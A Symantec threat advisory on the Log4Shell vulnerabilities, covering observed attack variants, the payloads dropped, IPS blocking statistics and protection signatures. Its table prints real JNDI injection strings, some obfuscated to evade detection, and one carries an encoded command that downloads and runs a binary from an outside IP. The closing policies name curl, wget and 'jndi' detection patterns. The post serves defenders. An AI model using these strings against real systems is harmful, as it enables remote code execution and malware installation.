Log4j Vulnerabilities: Attack Insights
Symantec data shows variation and scope of attacks.
Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the Apache Software Foundation.
Log4j has been making headlines recently after the public disclosure of three critical vulnerabilities in the utility which can lead to remote code execution (CVE-2021-44228 and CVE-2021-45046) and denial of service (CVE-2021-45105). The initial remote code execution vulnerability (CVE-2021-44228) has been dubbed Log4Shell and has dominated cyber-security news ever since it was publicly disclosed on December 9. The vulnerability has been exploited to deploy a plethora of payloads like coin miners, Dridex malware, and even ransomware such as Conti.
Variations in attacks
Symantec, a division of Broadcom Software, has observed numerous variations in attack requests primarily aimed at evading detection. Some sample attack requests can be seen in Table 1.
Attack requests |
---|
${jndi:ldap://:1389/Exploit} |
${jndi:dns://MASKED_IP.1/securityscan-http8085} |
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//MASKED_IP:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMjA5LjE0MS40Ni4xMTQvcmVhZGVyOyBjdXJsIC1PIGh0dHA6Ly8yMDkuMTQxLjQ2LjExNC9yZWFkZXI7IGNobW9kIDc3NyByZWFkZXI7IC4vcmVhZGVyIHJ1bm5lcg==}') |
${${lower:${lower:jndi}}:${lower:rmi}://MASKED_IP:1389/Binary} |
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://MASKED_IP:1389/Binary} |
${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}MASKED_IP:44${::-3}/${::-o}=${::-t}omca${::-t}} |
Attackers are predominantly using the LDAP and RMI protocols to download malicious payloads. We have also recorded vulnerability scans using protocols such as IIOP, DNS, HTTP, NIS etc.
Payloads
Muhstik Botnet - We have observed attackers downloading malicious Java class files as a part of Log4shell exploitation. The malicious class file downloads a shell file with the content shown in Figure 1.

The shell script attempts to download Executable and Linkable Format (ELF) files and execute them, which leads to the installation of the Muhstik botnet.
XMRig miner - We have also observed attackers installing the XMRig cryptocurrency miner as a part of post-exploitation activity related to Log4shell exploitation. The miner is downloaded via a simple PowerShell command (Figure 2).

The miner is executed with the command shown in Figure 3.

Malicious class file backdoor - We have also seen attacks attempt to download a malicious Java class file that acts as a backdoor. The class file has code to listen for and execute commands from the attacker (Figure 4).

Reverse Bash shell – Attackers were also observed deploying reverse shells on vulnerable machines (Figure 5).

Other publicly reported payloads include the Khonsari and Conti ransomware threats, the Orcus remote access Trojan (RAT), and the Dridex malware, among others.
Symantec IPS data
For the period between December 9 (when the first Log4j vulnerability was disclosed) and December 21, Symantec’s Intrusion Prevention System (IPS) blocked more than 93 million Log4Shell related exploitation attempts on more than 270,000 unique machines.

During the same time frame, IPS blocked more than 18 million Log4Shell related exploitation attempts on more than 60,000 unique server machines.

The majority of Log4Shell attacks blocked by Symantec were against machines located in the U.S. and the United Kingdom, followed by Singapore, India, and Australia.

Meanwhile, the majority of attacks exploiting the Log4j vulnerabilities seem to originate from devices located in the U.S. and Germany, followed by Russia, the United Kingdom, and China.

Protection
Behavior-based
- SONAR.Maljava!g7
- SONAR.Ransomware!g1
- SONAR.Ransomware!g31
- SONAR.Ransomware!g32
- SONAR.SuspLaunch!g184
- SONAR.SuspLaunch!g185
File-based
- CL.Suspexec!gen106
- CL.Suspexec!gen107
- CL.Suspexec!gen108
- Linux.Kaiten
- Miner.XMRig!gen2
- Ransom.Khonsari
- Ransom.Tellyouthepass
- Ransom.Tellyouthepa!g1
- Ransom.Tellyouthepa!g2
- Trojan Horse
- Trojan.Maljava
Machine learning-based
- Heur.AdvML.C
Network-based
- Audit: Suspicious Java Class File Executing Arbitrary Commands
- Audit: Log4j2 RCE CVE-2021-44228
- Audit: Malicious LDAP Response
- Attack: Log4j2 RCE CVE-2021-44228 2
- Attack: Malicious LDAP Response
- Attack: Log4j2 RCE CVE-2021-44228
- Attack: Log4j CVE-2021-45046
- Attack: Log4j CVE-2021-45105
- Web Attack: Malicious Java Payload Download 2
- Web Attack: Malicious Java Payload Download 3
- Web Attack: Malicious Java Payload Download 4
Policy-based
DCS provides multi-layered protection for Windows, Linux Server workloads, and container applications for this vulnerability:
- Suspicious Process Execution: Prevention policies prevent malware from being dropped or executed on the system. DCS hardened Linux servers prevent execution of malware from temp or other writable locations, a technique used by attackers to drop crypto miners such as XMRig in reported Log4shell exploitation.
- Review the Linux proxy execution list for your Log4j-based application sandbox to include additional tools such as */curl, */wget. These tools are used by attackers to connect from the victim Log4j application to external command-and-control servers for downloading additional payloads.
- DCS sandboxing of Windows and Linux applications prevent suspicious program execution using living-off-the-land tools and tampering of critical system services and resources.
- Network Control: Ability to block outgoing connections to public internet and limit required LDAP, HTTP, and other traffic from server workloads and containerized applications using Log4j2 to internal trusted systems.
- Detection Policies: System Attack detection: Baseline_WebAttackDetection_Generic_MaliciousUserAgent rule should be updated to include *jndi:* select string to alert on malicious server requests using the suspicious jndi lookup attempts via jndi:ldap, jndi:rmi, jndi:dns etc. Make sure to set the path to your web server access log file in the IDS Web Attack Detection option. Similar custom text log rules should be added for each of your Log4j application log files.
We encourage you to share your thoughts on your favorite social platform.